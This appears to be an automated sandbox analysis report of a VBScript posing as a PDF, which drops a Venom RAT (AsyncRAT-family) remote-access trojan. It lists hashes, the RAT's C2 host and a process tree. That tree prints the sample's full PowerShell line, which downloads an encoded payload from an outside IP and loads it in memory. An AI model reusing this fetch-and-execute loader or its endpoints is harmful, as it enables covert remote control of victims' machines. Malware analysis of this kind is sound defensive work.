Analysis

  • max time kernel
    594s
  • max time network
    597s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    14-10-2022 19:13

General

  • Target

    QKWERBD01BSNAS_002_PDF.vbs

  • Size

    442KB

  • MD5

    ef69b45b2a116ed60277d731e42c2f0e

  • SHA1

    0f1b9734dd43a034c56360e603659568ab65f91d

  • SHA256

    ace37f42d21bf2768add3a41954c1b5d41f85966af20de4483498c14ac4d8a7b

  • SHA512

    c2d037d408ed9a199a15ae960b53c112e2887571e87325794cf49a6f8c15af18bba380544b565d7e0f96dd68c9cda8fc416c50d595640086c1e8f31c62ac7e10

  • SSDEEP

    768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0I0gAOAqAn:7aW1AP4lgK

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Extracted

Family

asyncrat

Version

Venom RAT 5.0.5

Botnet

Venom Clients

C2

hugh69021.duckdns.org:7555

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\QKWERBD01BSNAS_002_PDF.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('2fc2e069481e-e589-8744-a310-1ce6957b=nekot&aidem=tla?txt.dsderpsO/o/moc.topsppa.swdldk/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4888
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5040

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f6c90ab0db80c6c3ea92556fda7273c7

    SHA1

    01d3866b1887cbb0abe9701f6b49c5dbc66a7dfa

    SHA256

    a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269

    SHA512

    aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f22ef27b8df15a4a683f1e37af74e3f8

    SHA1

    bcd6bda432c109e199b1a0acba4da56c794509c1

    SHA256

    6328dc368d16e4e20cd9d0859f55efb6af79a222a3e1ac53acd250e48ca75823

    SHA512

    f02948f0692f08d3f684b665b1f470f26009cb7199520d96191ce79c8b5b0bd878d1a1e4e9ee0f0b8641893717f20d0e3fd5d8fb1695e1ed7af959cdc5491a3c

  • memory/2640-125-0x00000193BAFA0000-0x00000193BAFC2000-memory.dmp

    Filesize

    136KB

  • memory/2640-128-0x00000193BB520000-0x00000193BB596000-memory.dmp

    Filesize

    472KB

  • memory/2640-135-0x00000193BB000000-0x00000193BB00C000-memory.dmp

    Filesize

    48KB

  • memory/2640-154-0x00000193BBAE0000-0x00000193BBAE8000-memory.dmp

    Filesize

    32KB

  • memory/5040-155-0x0000000000400000-0x0000000000416000-memory.dmp

    Filesize

    88KB

  • memory/5040-160-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-161-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-163-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-162-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-164-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-165-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-166-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-167-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-168-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-169-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-170-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-171-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-172-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-173-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-174-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-175-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-176-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-177-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-178-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-179-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-180-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-181-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-182-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-183-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-184-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-185-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-186-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-187-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-188-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-189-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-190-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-191-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-192-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-193-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-194-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-195-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-196-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-197-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-198-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-199-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-200-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-201-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-202-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-203-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-204-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-205-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-206-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-207-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-208-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-209-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-210-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-211-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-212-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-213-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-214-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-215-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-216-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-217-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-218-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-219-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-220-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-221-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB

  • memory/5040-222-0x0000000077D40000-0x0000000077ECE000-memory.dmp

    Filesize

    1.6MB